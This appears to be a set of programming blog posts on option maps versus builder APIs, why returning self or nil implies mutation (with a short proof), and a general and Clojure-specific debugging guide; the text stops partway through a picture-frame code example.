I like builders and have written APIs that provide builder patterns, but I really prefer option maps where the language makes it possible. Instead of a builder like

Wizard wiz = new WizardBuilder("some string")
               .withPriority(1)
               .withMode(SOME_ENUM)
               .enableFoo()
               .disableBar()
               .build();

I prefer writing something like

Wizard wiz = new Wizard("some string", {:priority 1 :mode SOME_ENUM :foo? true :bar? false})

Why?

  1. Option maps are usually shorter in languages with map literals.
  2. Option maps are data structures, not code. They’re easier to store and read from files. You can put them in databases or exchange them across the network. Over and over again I see boilerplate code that sucks in JSON and calls a builder fun for each key. This is silly.
  3. Builders in most languages (perhaps not Rust!) require an explicit freeze/build operation because they’re, well, mutable. Or you let people clobber them whenever, I guess. :-/
  4. Option maps compose better. You can write functions that transform the map, or add default values, etc, and call a downstream function. Composing builders requires yielding the builder back to the caller via a continuation, block, fun, etc.
  5. Option maps are obviously order-independent; builder APIs are explicitly mutating the builder, which means the order of options can matter. This makes composition in builders less reliable.
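To make the composition point concrete, here's a sketch in Ruby, whose hash literals make option maps cheap. The `Wizard`-flavored names (`wizard_with_defaults`, the option keys) are illustrative, not from any real API:

```ruby
# Hypothetical option names, echoing the Wizard example above.
DEFAULTS = { priority: 0, mode: :normal, foo: true, bar: true }

# A downstream constructor just receives a plain hash...
def build_wizard(name, opts = {})
  { name: name }.merge(opts)
end

# ...so callers can layer defaults, overrides, and config-file data
# with ordinary merges -- no builder plumbing, no freeze/build step.
def wizard_with_defaults(name, opts = {})
  build_wizard(name, DEFAULTS.merge(opts))
end

wiz = wizard_with_defaults("some string", priority: 1, foo: false)
# wiz => {:name=>"some string", :priority=>1, :mode=>:normal,
#         :foo=>false, :bar=>true}
```

Because the options are just data, the same `DEFAULTS.merge(opts)` trick works whether `opts` came from code, a config file, or a network payload.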

Why not use option maps everywhere? I suspect it has to do with type systems. Most languages only have unityped maps (e.g. java.util.Map&lt;String, Object&gt;) where any key is allowed, but options usually have fixed names and specific but heterogeneous types. The option map above has booleans, integers, and enums, for example.

In languages like Java, it’s impossible to specify type constraints like “This map has a :foo? key which must be a boolean, and has a :mode key that can only be one of these three values”. Using a builder with explicit type signatures for each function lets you statically verify that the caller is using the correct keys and providing values of the appropriate type. [1]

Of course, all this goes out the window when folks start reading config files at runtime, because you can’t statically verify the config file, so type errors will appear at runtime anyway–but you can certainly get some static benefit wherever the configuration is directly embedded in the code.

[1] Know what a typed heterogeneous map is in Java? It’s an Object! From this perspective, builders are just really verbose option maps with static types.

So there’s a blog post that advises every method should, when possible, return self. I’d like to suggest you do the opposite: wherever possible, return something other than self.

Mutation is hard

Mutation makes code harder to reason about. Mutable objects make equality comparisons tricky: if you use a mutable object as the key in a hashmap, for instance, then change one of its fields, what happens? Can you look up the value using the key’s new state? Its old state? What about a set? An array? For a fun time, try these in various languages. Try it with mutable primitives, like Strings, if the language makes a distinction. Enjoy the results.
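Here's what this looks like in Ruby. (Arrays make a good demonstration because, unlike String keys — which Ruby defensively dups and freezes on insertion, precisely to dodge this trap — array keys are stored as-is.)

```ruby
key = [1, 2]
h = { key => :sleepy }

h[[1, 2]]     # => :sleepy, as expected

key << 3      # mutate the key in place

# The entry is filed under the key's *old* hash code, so neither
# the old nor the new value can find it:
h[[1, 2]]     # => nil (bucket matches, but the stored key is now [1, 2, 3])
h[[1, 2, 3]]  # => nil (hashes to a different bucket than the stored entry)
h[key]        # => nil -- the key object itself can't find its own entry!

h.rehash      # recompute hash codes for every key
h[key]        # => :sleepy again
```

The fact that Ruby special-cases String keys at all is a tell: mutable keys are so error-prone that the language papers over the most common case.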

If you call a function with a mutable object as an argument, you have very few guarantees about the new object’s value. It’s up to you to enforce invariants like “certain fields must be read together”.

If you have two threads interacting with mutable objects concurrently, things get weird fast.

Now, nobody’s arguing that mutability is always bad. There are really good reasons to mutate: your program must ultimately change state and perform IO to be meaningful. Mutation is usually faster, reduces GC pressure, and can be safe! It just comes with costs. The more of your program deals with pure values, the easier it is to reason about. If you compare two objects now, you know they’ll compare the same later. You can pass arguments to functions without ever having to worry that they’ll be changed out from underneath you. It gets easier to reason about thread safety.

Moreover, you don’t need a fancy type system like Haskell to experience these benefits: even in the unityped default-mutable wonderland of Ruby, having a culture that makes mutation explicit (for instance, gsub vs gsub!), a culture where not clobbering state is the default, can make our jobs a little easier. Remember, we don’t have to categorically prevent bugs; just make them less likely. Every bit helps.
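The gsub/gsub! convention in action:

```ruby
s = "mutation is hard"

t = s.gsub("hard", "explicit")   # no bang: returns a new string
s                                # => "mutation is hard" (untouched)
t                                # => "mutation is explicit"

s.gsub!("hard", "explicit")      # bang: clobbers the receiver in place
s                                # => "mutation is explicit"
```

The trailing `!` doesn't prevent anything; it just makes the clobbering visible at the call site, which is often enough.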

Returning nil, void, or self strongly suggests impurity

Any time you see a method like

public void foo(String x) { ... }

function (a, b) { ... return undefined; }

def foo(args)
  ...
  self
end

you should read: “This function probably mutates state!” In an object oriented language, it might mutate the receiver (self or this). It might mutate any of its arguments. It might mutate variables in lexical scope. It might mutate the computing environment, by setting a global variable, or writing to the filesystem, or sending a network packet.

The hand-wavy argument for this is that there is exactly one meaningful pure function for each of these three return types: the constant void function, the constant nil function, and the identity function(s). If you see this signature used over and over, it’s a hint you’re staring at a big ball of mutable state.

Proof

We aim to show there is only one pure function returning void, one pure function returning nil, etc. In general, we wish to show for any value r you might care to return, there exists exactly one pure function which always returns r.

I’m going to try to write this for folks without a proofs background, but I will use some notation:

  • Capital letters, e.g. X, denote sets
  • f(x) is function application
  • a iff b means “a if, and only if, b”
  • | means “such that”
  • ∀ x means “for all x”
  • ∃ x means “there exists an x”
  • x ∈ X means “x is an element of the set X”
  • (x, y) is an ordered pair, like a tuple
  • X x Y is the Cartesian product: all ordered pairs of (x, y) taken from X and Y respectively.

Definitions

I’m going to depart slightly from the usual set-theoretic definitions to simplify the proof and reduce confusion with common CS terms. We’re interested in functions which might:

  • Take a receiver (e.g. this, self)
  • Take arguments
  • Return values
  • Throw exceptions
  • Depend on an environment
  • Mutate their environment

Let’s simplify.

  • A receiver is simply the first argument to a function.
  • Zero or multiple arguments can be represented as an ordered tuple: (), (arg1), (arg1, arg2, arg3, …).
  • Returning multiple return values (as in go) can be modeled by returning tuples.
  • Exceptions can be modeled as a special set of return values, e.g. ("exception", "something bad!")
  • In addition to mapping an argument to a return value, the function will map an initial environment e to a (possibly identical) final environment e'. The environment encapsulates IO, global variables, dynamic scope, mutable state, etc.
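Before the formal definition, here's this environment-passing model as a toy Ruby sketch (purely illustrative; the names `tick`, `const42`, and `pure` are mine):

```ruby
# In this model, a function maps [env, x] -> [env', y].

# Impure: returns a new environment with a counter bumped.
tick = lambda do |env, x|
  [env.merge("count" => env["count"] + 1), x]
end

# Pure: hands its environment back untouched, always returns 42.
const42 = lambda { |env, x| [env, 42] }

# Definition 2, as a predicate: pure iff the environment round-trips.
pure = lambda do |f, env, x|
  e2, _y = f.call(env, x)
  env == e2
end

env = { "count" => 0 }
pure.call(const42, env, :anything)  # => true
pure.call(tick, env, :anything)     # => false
```

Note that `tick` builds its new environment with a non-destructive `merge`, so even the impure function is modeled as a value-to-value mapping — which is exactly what lets us treat functions as sets of tuples below.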

Now we adapt the usual set-theoretic graph definition of a function to our model:

Definition 1. A function f in an environment set E, from an input set X (the “domain”), to a set of return values Y (the “codomain”), written f: E, X -> Y, is the set of ordered tuples (e, e', x, y) where e and e' ∈ E, x ∈ X, and y ∈ Y, with two constraints:

  1. Completeness. ∀ x ∈ X, e ∈ E: ∃ (e, e', x, y) ∈ f.
  2. Determinism. ∀ (e1, e1', x1, y1), (e2, e2', x2, y2) ∈ f: if e1 = e2 and x1 = x2, then e1' = e2' and y1 = y2.

Completeness simply means that the function must return a value for all environments and x’s. Determinism just means that the environment and input x uniquely determine the new environment and return value. Nondeterministic functions are modeled by state in the environment.

We write function application in this model as f(e, x) = (e', y). Read: “Calling f on x in environment e returns y and changes the environment to e'.”

Definition 2. A function is pure iff ∀ (e, e', x, y) ∈ f, e = e'; i.e., its initial and final environments are identical.

There can be only one

We wish to show that for any value r, there is only one pure function which always returns r. Assume there exist two distinct pure functions f and g, over the same domain X, returning r. Remember, these functions are pure, so their initial and final environments are the same:

  • ∀ e ∈ E, x ∈ X: f(e, x) = (e, r)
  • ∀ e ∈ E, x ∈ X: g(e, x) = (e, r)

But by definition 1, f and g are simply:

  • f = {(e, e, x, r) | e ∈ E, x ∈ X}
  • g = {(e, e, x, r) | e ∈ E, x ∈ X}

… which are identical sets. We obtain a contradiction: f and g cannot be distinct; therefore, for any environment set E and over any input set X, there exists only a single pure function returning r. ∎

You can make the exact same argument for functions that return their first (or nth) argument: they’re just variations on the identity function, one version for each arity:

  • (e, e, (x), x)
  • (e, e, (x, a), x)
  • (e, e, (x, a, b), x)
  • (e, e, (x, a, b, …), x)

Redundancy of functions over different domains

Given two pure single-valued functions over different domains f: E, X1 -> {r} and g: E, X2 -> {r}, let h be the set of all tuples in either f or g: h = f ∪ g.

Since f is pure, ∀ (e, e', x, y) ∈ f, e = e'; and the same for g. Therefore, ∀ (e, e', x, y) ∈ h, e = e' as well: h does not mutate its environment.

Since f has a mapping for all combinations of environments in E and inputs in X1, so does h. And the same goes for g: h has mappings for all combinations of environments in E and inputs in X2. h is therefore complete over E and X1 ∪ X2.

Since f and g always return r, ∀ (e, e', x, y) ∈ h, y = r too. Because h can never have multiple values for y (and because it does not mutate its environment), it is deterministic per definition 1.

Therefore, h is a pure function in E over X1 ∪ X2–and is therefore a pure function over either X1 or X2 alone. You can safely replace any instance of f or g with h: there isn’t really a point to having more than one pure function returning void, nil, etc. in your program, unless you’re doing it for static type safety.

Don’t believe me? Here’s a single Clojure function that can replace any pure function returning its first argument. Works on integers, strings, other functions… whatever types you like.

user=> (def selfie (fn [self & args] self))
#'user/selfie
user=> (selfie 3)
3
user=> (selfie "channing" "tatum")
"channing"

Returning self suggests impurity

You can write the same function more than one way. Here are two pure functions in Ruby that both return self:

def meow
  self
end

def stretch
  nil
  ENV["USER"] + " in spaaace"
  5.3 / 3
  self
end

meow is just identity–but so is stretch, and, by our proof above, so is every other pure function returning self. The only difference is that stretch has useless dead code, which any compiler, linter, or human worth their salt will strip out. Writing code like this is probably silly. You can construct weird cases (interfaces, etc) where you want a whole bunch of identity functions, or (constantly nil), etc, but I think those are pretty rare.

What about calling a function then returning self?

def foo
  enjoy("http://shirtless-channing-tatum.biz")
  self
end

There are only two cases. If enjoy is pure, so is foo, and we can replace the function by

def foo
  self
end

If enjoy is impure (and let’s face it: shirtless Channing Tatum induces side effects in most callers), then foo is also impure, and we’re back to square one: mutation.

Final thoughts

When you see functions that return void, nil, or self, ask “what is this mutating?” If you have a pure function (say, returning the number of explosions in a film) and follow the advice of returning self as much as possible, you are turning a pure function into an impure one. You have to add state and mutability to the system. You should strive to do the opposite: reduce mutation wherever possible.

I assure you, return values are OK.

Writing software can be an exercise in frustration. Useless error messages, difficult-to-reproduce bugs, missing stacktrace information, obscure functions without documentation, and unmaintained libraries all stand in our way. As software engineers, our most useful skill isn’t so much knowing how to solve a problem as knowing how to explore a problem that we haven’t seen before. Experience is important, but even experienced engineers face unfamiliar bugs every day. When a problem doesn’t bear a resemblance to anything we’ve seen before, we fall back on general cognitive strategies to explore–and ultimately solve–the problem.

There’s an excellent book by the mathematician George Polya: How to Solve It, which tries to catalogue how successful mathematicians approach unfamiliar problems. When I catch myself banging my head against a problem for more than a few minutes, I try to back up and consider his principles. Sometimes, just taking the time to slow down and reflect can get me out of a rut.

  1. Understand the problem.
  2. Devise a plan.
  3. Carry out the plan.
  4. Look back.

Seems easy enough, right? Let’s go a little deeper.

Understanding the problem

Well obviously there’s a problem, right? The program failed to compile, or a test spat out bizarre numbers, or you hit an unexpected exception. But try to dig a little deeper than that. Just having a careful description of the problem can make the solution obvious.

Our audit program detected that users can double-withdraw cash from their accounts.

What does your program do? Chances are your program is large and complex, so try to isolate the problem as much as possible. Find preconditions where the error holds.

The problem occurs after multiple transfers between accounts.

Identify specific lines of code from the stacktrace that are involved, specific data that’s being passed around. Can you find a particular function that’s misbehaving?

The balance transfer function sometimes doesn’t increase or decrease the account values correctly.

What are that function’s inputs and outputs? Are the inputs what you expected? What did you expect the result to be, given those arguments? It’s not enough to know “it doesn’t work”–you need to know exactly what should have happened. Try to find conditions where the function works correctly, so you can map out the boundaries of the problem.

Trying to transfer $100 from A to B works as expected, as does a transfer of $50 from B to A. Running a million random transfers between accounts, sequentially, results in correct balances. The problem only seems to happen in production.

If your function–or functions it calls–uses mutable state, like an agent, atom, or ref, the value of those references matters too. This is why you should avoid mutable state wherever possible: each mutable variable introduces another dimension of possible behaviors for your program. Print out those values when they’re read, and after they’re written, to get a description of what the function is actually doing. I am a huge believer in sprinkling (prn x) throughout one’s code to print how state evolves when the program runs.

Each balance is stored in a separate atom. When two transfers happen at the same time involving the same accounts, the new value of one or both atoms may not reflect the transfer correctly.

Look for invariants: properties that should always be true of a program. Devise a test to look for where those invariants are broken. Consider each individual step of the program: does it preserve all the invariants you need? If it doesn’t, what ensures those invariants are restored correctly?

The total amount of money in the system should be constant–but sometimes changes!
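An invariant like that is cheap to check in code. A sketch in Ruby (hypothetical balances and a deliberately naive `transfer!`):

```ruby
accounts = { a: 100, b: 50, c: 25 }
total = accounts.values.sum   # 175 -- should never change

def transfer!(accounts, from, to, amount)
  accounts[from] -= amount
  accounts[to]   += amount
end

1000.times do
  transfer!(accounts, [:a, :b, :c].sample, [:a, :b, :c].sample, rand(10))
  # The invariant check: money is conserved after every single step.
  raise "invariant violated!" unless accounts.values.sum == total
end
```

Run sequentially, this never raises — which is itself useful information: it tells us the bug lives in the concurrent interleaving, not in the arithmetic.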

Draw diagrams, and invent a notation to talk about the problem. If you’re accessing fields in a vector, try drawing the vector as a set of boxes, and drawing the fields it accesses, step by step on paper. If you’re manipulating a tree, draw one! Figure out a way to write down the state of the system: in letters, numbers, arrows, graphs, whatever you can dream up.

Transferring $5 from A to B in transaction 1, and $5 from B to A in transaction 2:

Transaction  |  A  |  B
-------------+-----+-----
txn1 read    | 10  | 10    ; Transaction 1 sees 10, 10
txn1 write A |  5  | 10    ; A and B now out-of-sync
txn2 read    |  5  | 10    ; Transaction 2 sees 5, 10
txn1 write B |  5  | 15    ; Transaction 1 completes
txn2 write A | 10  | 15    ; Transaction 2 writes based on out-of-sync read
txn2 write B | 10  |  5    ; Should have been 10, 10!
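We can even replay an interleaving like this deterministically in code, to check the notation against reality. A toy Ruby sketch of two conflicting $5 transfers (variable names are mine):

```ruby
a, b = 10, 10

# txn1 transfers $5 from A to B; txn2 transfers $5 from B to A.
t1_a, t1_b = a, b   # txn1 read:    sees 10, 10
a = t1_a - 5        # txn1 write A: a = 5
t2_a, t2_b = a, b   # txn2 read:    sees 5, 10 -- out of sync!
b = t1_b + 5        # txn1 write B: b = 15
a = t2_a + 5        # txn2 write A: a = 10
b = t2_b - 5        # txn2 write B: b = 5, based on the stale read

[a, b]              # => [10, 5] -- $5 has vanished; should be [10, 10]
```

Writing the schedule out as straight-line code like this turns a fuzzy "sometimes the balances are wrong" into a concrete, reproducible lost-update scenario.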

This doesn’t solve the problem, but helps us explore the problem in depth. Sometimes this makes the solution obvious–other times, we’re just left with a pile of disjoint facts. Even if things look jumbled-up and confusing, don’t despair! Exploring gives the brain the pieces; it’ll link them together over time.

Armed with a detailed description of the problem, we’re much better equipped to solve it.

Devise a plan

Our brains are excellent pattern-matchers, but not that great at tracking abstract logical operations. Try changing your viewpoint: rotating the problem into a representation that’s a little more tractable for your mind. Is there a similar problem you’ve seen in the past? Is this a well-known problem?

Make sure you know how to check the solution. With the problem isolated to a single function, we can write a test case that verifies the account balances are correct. Then we can experiment freely, and have some confidence that we’ve actually found a solution.

Can you solve a related problem? If only concurrent transfers trigger the problem, could we solve the issue by ensuring transactions never take place concurrently–e.g. by wrapping the operation in a lock? Could we solve it by logging all transactions, and replaying the log? Is there a simpler variant of the problem that might be tractable–maybe one that always overcounts, but never undercounts?
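The lock-based variant is easy to sketch in Ruby: one global Mutex serializing every transfer. Coarse-grained and slow, but it rules out the bad interleaving entirely (the names here are illustrative):

```ruby
LOCK = Mutex.new
accounts = { a: 10, b: 10 }

def transfer!(accounts, from, to, amount)
  # Holding the lock makes the read-then-write atomic: no other
  # transfer can sneak in between our read and our write.
  LOCK.synchronize do
    accounts[from] -= amount
    accounts[to]   += amount
  end
end

threads = 10.times.map do
  Thread.new do
    100.times do
      transfer!(accounts, :a, :b, 5)
      transfer!(accounts, :b, :a, 5)
    end
  end
end
threads.each(&:join)

accounts.values.sum  # money is conserved: still 20
```

Whether this "solves" the problem depends on the requirements — a single lock may be an unacceptable bottleneck — but as a related, simpler problem it confirms the diagnosis: serialize the transfers and the anomaly disappears.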

Consider your assumptions. We rely on layers of abstraction in writing software–that changing a variable is atomic, that lexical variables don’t change, that adding 1 and 1 always gives 2. Sometimes, parts of the computer fail to guarantee those abstractions hold. The CPU might–very rarely–fail to divide numbers correctly. A library might, for supposedly valid input, spit out a bad result. A numeric algorithm might fail to converge, and spit out wrong numbers. To avoid questioning everything, start in your own code, and work your way down to the assumptions themselves. See if you can devise tests that check the language or library is behaving as you expect.

Can you avoid solving the problem altogether? Is there a library, database, or language feature that does transaction management for us? Is integrating that library worth the reduced complexity in our application?

We’re not mathematicians; we’re engineers. Part theorist, yes, but also part mechanic. Some problems take a more abstract approach, and others are better approached by tapping it with a wrench and checking the service manual. If other people have solved your problem already, using their solution can be much simpler than devising your own.

Can you think of a way to get more diagnostic information? Perhaps we could log more data from the functions that are misbehaving, or find a way to dump and replay transactions from the live program. Some problems disappear when instrumented; these are the hardest to solve, but also the most rewarding.

Combine key phrases in a Google search: the name of the library you’re using, the type of exception thrown, any error codes or log messages. Often you’ll find a StackOverflow result, a mailing list post, or a Github issue that describes your problem. This works well when you know the technical terms for your problem–in our case, that we’re performing an atomic, transactional transfer between two variables. Sometimes, though, you don’t know the established names for your problem, and have to resort to blind queries like “variables out of sync” or “overwritten data”–which are much more difficult.

When you get stuck exploring on your own, try asking for help. Collect your description of the problem, the steps you took, and what you expected the program to do. Include any stacktraces or error messages, log files, and the smallest section of source code required to reproduce the problem. Also include the versions of software used–in Clojure, typically the JVM version (java -version), Clojure version (project.clj), and any other relevant library versions.

If the project has a Github page or public issue tracker, like Jira, you can try filing an issue there. Here’s a particularly well-written issue filed by a user on one of my projects. Note that this user included installation instructions, the command they ran, and the stacktrace it printed. The more specific a description you provide, the easier it is for someone else to understand your problem and help!

Sometimes you need to talk through a problem interactively. For that, I prefer IRC–many projects have a channel on the Freenode IRC network where you can ask basic questions. Remember to be respectful of the channel’s time; there may be hundreds of users present, and they have to sort through everything you write. Paste your problem description into a pastebin like Gist, then mention the link in IRC with a short–say a few sentences–description of the problem. I try asking in a channel devoted to a specific library or program first, then back off to a more general channel, like #clojure. There’s no need to ask “Can I ask a question” first–just jump in.

Since the transactional problem we’ve been exploring seems like a general issue with atoms, I might ask in #clojure

aphyr > Hi! Does anyone know the right way to change multiple atoms at the same time?
aphyr > This function and test case (http://gist.github.com/...) seems to double- or under-count when invoked concurrently.

Finally, you can join the project’s email list, and ask your question there. Turnaround times are longer, but you’ll often find a more in-depth response to your question via email. This applies especially if you and the maintainer are in different time zones, or if they’re busy with life. You can also ask specific problems on StackOverflow or other message boards; users there can be incredibly helpful.

Remember, other engineers are taking time away from their work, family, friends, and hobbies to help you. It’s always polite to give them time to answer first–they may have other priorities. A sincere thank-you is always appreciated–as is paying it forward by answering other users' questions on the list or channel!

Dealing with abuse

Sadly, some women, LGBT people, and so on experience harassment on IRC or in other discussion circles. They may be asked inappropriate personal questions, insulted, threatened, assumed to be straight, to be a man, and so on. Sometimes other users will attack questioners for inexperience. Exclusion can be overt (“Read the fucking docs, faggot!”) or more subtle (“Hey dudes, what’s up?”). It only takes one hurtful experience like this to sour someone on an entire community.

If this happens to you, place your own well-being first. You are not obligated to fix anyone else’s problems, or to remain in a social context that makes you uncomfortable.

That said, be aware the other people in a channel may not share your culture. English may not be their main language, or they may have said something hurtful without realizing its impact. Explaining how the comment made you feel can jar a well-meaning but unaware person into reconsidering their actions.

Other times, people are just mean–and it only takes one to ruin everybody’s day. When this happens, you can appeal to a moderator. On IRC, moderators are sometimes identified by an @ sign in front of their name; on forums, they may have a special mark on their username or profile. Large projects may have an official policy for reporting abuse on their website or in the channel topic. If there’s no policy, try asking whoever seems in charge for help. Most projects have a primary maintainer or community manager with the power to mute or ban malicious users.

Again, these ways of dealing with abuse are optional. You have no responsibility to provide others with endless patience, and it is not your responsibility to fix a toxic culture. You can always log off and try something else. There are many communities which will welcome and support you–it may just take a few tries to find the right fit.

If you don’t find community, you can build it. Starting your own IRC channel, mailing list, or discussion group with a few friends can be a great way to help each other learn in a supportive environment. And if trolls ever come calling, you’ll be able to ban them personally.

Now, back to problem-solving.

Carry out the plan

Sometimes we can make a quick fix in the codebase, test it by hand, and move on. But for more serious problems, we’ll need a more involved process. I always try to get a reproducible test suite–one that runs in a matter of seconds–so that I can continually check my work.

Persist. Many problems require grinding away for some time. Mix blind experimentation with sitting back and planning. Periodically re-evaluate your work–have you made progress? Identified a sub-problem that can be solved independently? Developed a new notation?

If you get stuck, try a new tack. Save your approach as a comment or using git stash, and start fresh. Maybe using a different concurrency primitive is in order, or rephrasing the data structure entirely. Take a reading break and review the documentation for the library you’re trying to use. Read the source code for the functions you’re calling–even if you don’t understand exactly what it does, it might give you clues to how things work under the hood.

Bounce your problem off a friend. Grab a sheet of paper or whiteboard, describe the problem, and work through your thinking with that person. Their understanding of the problem might be totally off-base, but can still give you valuable insight. Maybe they know exactly what the problem is, and can point you to a solution in thirty seconds!

Finally, take a break. Go home. Go for a walk. Lift heavy, run hard, space out, drink with your friends, practice music, read a book. Just before sleep, go over the problem once more in your head; I often wake up with a new algorithm or new questions burning to get out. Your unconscious mind can come up with unexpected insights if given time away from the problem!

Some folks swear by time in the shower, others by hiking, or with pen and paper in a hammock. Find what works for you! The important thing seems to be giving yourself time away from struggling with the problem.

Look back

Chances are you’ll know as soon as your solution works. The program compiles, transactions generate the correct amounts, etc. Now’s an important time to solidify your work.

Bolster your tests. You may have made the problem less likely, but not actually solved it. Try a more aggressive, randomized test; one that runs for longer, that generates a broader class of input. Try it on a copy of the production workload before deploying your change.

Identify why the new system works. Pasting something in from StackOverflow may get you through the day, but won’t help you solve similar problems in the future. Try to really understand why the program went wrong, and how the new pieces work together to prevent the problem. Is there a more general underlying problem? Could you generalize your technique to solve a related problem? If you’ll encounter this type of issue frequently, could you build a function or library to help build other solutions?

Document the solution. Write down your description of the problem, and why your changes fix it, as comments in the source code. Use that same description of the solution in your commit message, or attach it as a comment to the resources you used online, so that other people can come to the same understanding.

Debugging Clojure

With these general strategies in mind, I’d like to talk specifically about debugging Clojure code–especially understanding its stacktraces. Consider this simple program for baking cakes:

(ns scratch.debugging)

(defn bake
  "Bakes a cake for a certain amount of time, returning a cake
  with a new :tastiness level."
  [pie temp time]
  (assoc pie :tastiness
         (condp (* temp time) <
           400 :burned
           350 :perfect
           300 :soggy)))

And in the REPL

user=> (bake {:flavor :blackberry} 375 10.25)

ClassCastException java.lang.Double cannot be cast to clojure.lang.IFn  scratch.debugging/bake (debugging.clj:8)

This is not particularly helpful. Let’s print a full stacktrace using pst:

user=> (pst)
ClassCastException java.lang.Double cannot be cast to clojure.lang.IFn
    scratch.debugging/bake (debugging.clj:8)
    user/eval1223 (form-init4495957503656407289.clj:1)
    clojure.lang.Compiler.eval (Compiler.java:6619)
    clojure.lang.Compiler.eval (Compiler.java:6582)
    clojure.core/eval (core.clj:2852)
    clojure.main/repl/read-eval-print--6588/fn--6591 (main.clj:259)
    clojure.main/repl/read-eval-print--6588 (main.clj:259)
    clojure.main/repl/fn--6597 (main.clj:277)
    clojure.main/repl (main.clj:277)
    clojure.tools.nrepl.middleware.interruptible-eval/evaluate/fn--591 (interruptible_eval.clj:56)
    clojure.core/apply (core.clj:617)
    clojure.core/with-bindings* (core.clj:1788)

The first line tells us the type of the error: a ClassCastException. Then there’s some explanatory text: we can’t cast a java.lang.Double to a clojure.lang.IFn. The indented lines show the functions that led to the error. The first line is the deepest function, where the error actually occurred: the bake function in the scratch.debugging namespace. In parentheses is the file name (debugging.clj) and line number (8) from the code that caused the error. Each following line shows the function that called the previous line. In the REPL, our code is invoked from a special function compiled by the REPL itself–with an automatically generated name like user/eval1223, and that function is invoked by the Clojure compiler, and the REPL tooling. Once we see something like Compiler.eval at the repl, we can generally skip the rest.

As a general rule, we want to look at the deepest (earliest) point in the stacktrace that we wrote. Sometimes an error will arise from deep within a library or Clojure itself–but it was probably invoked by our code somewhere. We’ll skim down the lines until we find our namespace, and start our investigation at that point.

Our case is simple: debugging.clj, on line 8, seems to be the culprit.

(condp (* temp time) <

Now let’s consider the error itself: ClassCastException: java.lang.Double cannot be cast to clojure.lang.IFn. This implies we had a Double and tried to cast it to an IFn–but what does “cast” mean? For that matter, what’s a Double, or an IFn?

A quick google search for java.lang.Double reveals that it’s a class (a Java type) with some basic documentation. “The Double class wraps a value of the primitive type double in an object” is not particularly informative–but the “class hierarchy” at the top of the page shows that a Double is a kind of java.lang.Number. Let’s experiment at the REPL:

user=> (type 4)
java.lang.Long
user=> (type 4.5)
java.lang.Double

Indeed: decimal numbers in Clojure appear to be doubles. One of the expressions in that condp call was probably a decimal. At first we might suspect the literal values 300, 350, or 400–but those are Longs, not Doubles. The only Double we passed in was the time duration 10.25–which appears in condp as (* temp time). That first argument was a Double, but should have been an IFn.

What the heck is an IFn? Its source code has a comment:

IFn provides complete access to invoking any of Clojure’s API’s. You can also access any other library written in Clojure, after adding either its source or compiled form to the classpath.

So IFn has to do with invoking Clojure’s API. Ah–Fn probably stands for function–and this class is chock full of things like invoke(Object arg1, Object arg2). That suggests that IFn is about calling functions. And the I? Google suggests it’s a Java convention for an interface–whatever that is. Remember, we don’t have to understand everything–just enough to get by. There’s plenty to explore later.

Let’s check our hypothesis in the REPL:

user=> (instance? clojure.lang.IFn 2.5)
false
user=> (instance? clojure.lang.IFn conj)
true
user=> (instance? clojure.lang.IFn (fn [x] (inc x)))
true

So Doubles aren’t IFns–but Clojure built-in functions, and anonymous functions, both are. Let’s double-check the docs for condp again:

user=> (doc condp)
-------------------------
clojure.core/condp
([pred expr & clauses])
Macro
  Takes a binary predicate, an expression, and a set of clauses.
  Each clause can take the form of either:

  test-expr result-expr

  test-expr :>> result-fn

  Note :>> is an ordinary keyword.

  For each clause, (pred test-expr expr) is evaluated. If it returns
  logical true, the clause is a match. If a binary clause matches, the
  result-expr is returned, if a ternary clause matches, its result-fn,
  which must be a unary function, is called with the result of the
  predicate as its argument, the result of that call being the return
  value of condp. A single default expression can follow the clauses,
  and its value will be returned if no clause matches. If no default
  expression is provided and no clause matches, an
  IllegalArgumentException is thrown.

That’s a lot to take in! No wonder we got it wrong! We’ll take it slow, and look at the arguments.

(condp (* temp time) <

Our pred was (* temp time) (a Double), and our expr was the comparison function <. For each clause, (pred test-expr expr) is evaluated, so that would expand to something like

((* temp time) 400 <)

Which evaluates to something like

(123.45 400 <)

But this isn’t a valid Lisp program! It starts with a number, not a function. We should have written (< 123.45 400). Our arguments are backwards!

(defn bake
  "Bakes a cake for a certain amount of time, returning a cake with
  a new :tastiness level."
  [pie temp time]
  (assoc pie :tastiness (condp < (* temp time)
                          400 :burned
                          350 :perfect
                          300 :soggy)))

user=> (use 'scratch.debugging :reload)
nil
user=> (bake {:flavor :chocolate} 375 10.25)
{:tastiness :burned, :flavor :chocolate}
user=> (bake {:flavor :chocolate} 450 0.8)
{:tastiness :perfect, :flavor :chocolate}

Mission accomplished! We read the stacktrace as a path to a part of the program where things went wrong. We identified the deepest part of that path in our code, and looked for a problem there. We discovered that we had reversed the arguments to a function, and after some research and experimentation in the REPL, figured out the right order.

An aside on types: some languages have a stricter type system than Clojure’s, in which the types of variables are explicitly declared in the program’s source code. Those languages can detect type errors–when a variable of one type is used in place of another, incompatible, type–and offer more precise feedback. In Clojure, the compiler does not generally enforce types at compile time, which allows for significant flexibility–but requires more rigorous testing to expose these errors.

Higher order stacktraces

The stacktrace shows us a path through the program, moving downwards through functions. However, that path may not be straightforward. When data is handed off from one part of the program to another, the stacktrace may not show the origin of an error. When functions are handed off from one part of the program to another, the resulting traces can be tricky to interpret indeed.

For instance, say we wanted to make some picture frames out of wood, but didn’t know how much wood to buy. We might sketch out a program like this:

(defn perimeter
  "Given a rectangle, returns a vector of its edge lengths."
  [rect]
  [(:x rect)
   (:y rect)
   (:z rect)
   (:y rect)])

(defn frame
  "Given a mat width, and a photo rectangle, figure out the size of the
  frame required by adding the mat width around all edges of the photo."
  [mat-width rect]
  (let [margin (* 2 rect)]
    {:x (+ margin (:x rect))
     :y (+ margin (:y rect))}))

(def failure-rate
  "Sometimes the wood is knotty or we screw up a cut. We'll assume we
  need a spare segment once every 8."
  1/8)

(defn spares
  "Given a list of segments, figure out roughly how many of each
  distinct size will go bad, and emit a sequence of spare segments,
  assuming we screw up `failure-rate` of them."
  [segments]
  (->> segments
       ; Compute a map of each segment length to the number of
       ; segments we'll need of that size.
       frequencies
       ; Make a list of spares for each segment length,
       ; based on how often we think we'll screw up.
       (mapcat (fn [[segment n]]
                 (repeat (* failure-rate n)
                         segment)))))

(def cut-size
  "How much extra wood do we need for each cut? Let's say a mitred cut
  for a 1-inch frame needs a full inch."
  1)

(defn total-wood
  [mat-width photos]
  "Given a mat width and a collection of photos, compute the total
  linear amount of wood we need to buy in order to make frames for
  each, given a 2-inch mat."
  (let [segments (->> photos
                      ; Convert photos to frame dimensions
                      (map (partial frame mat-width))
                      ; Convert frames to segments
                      (mapcat perimeter))]

    ; Now, take segments
    (->> segments
         ; Add the spares
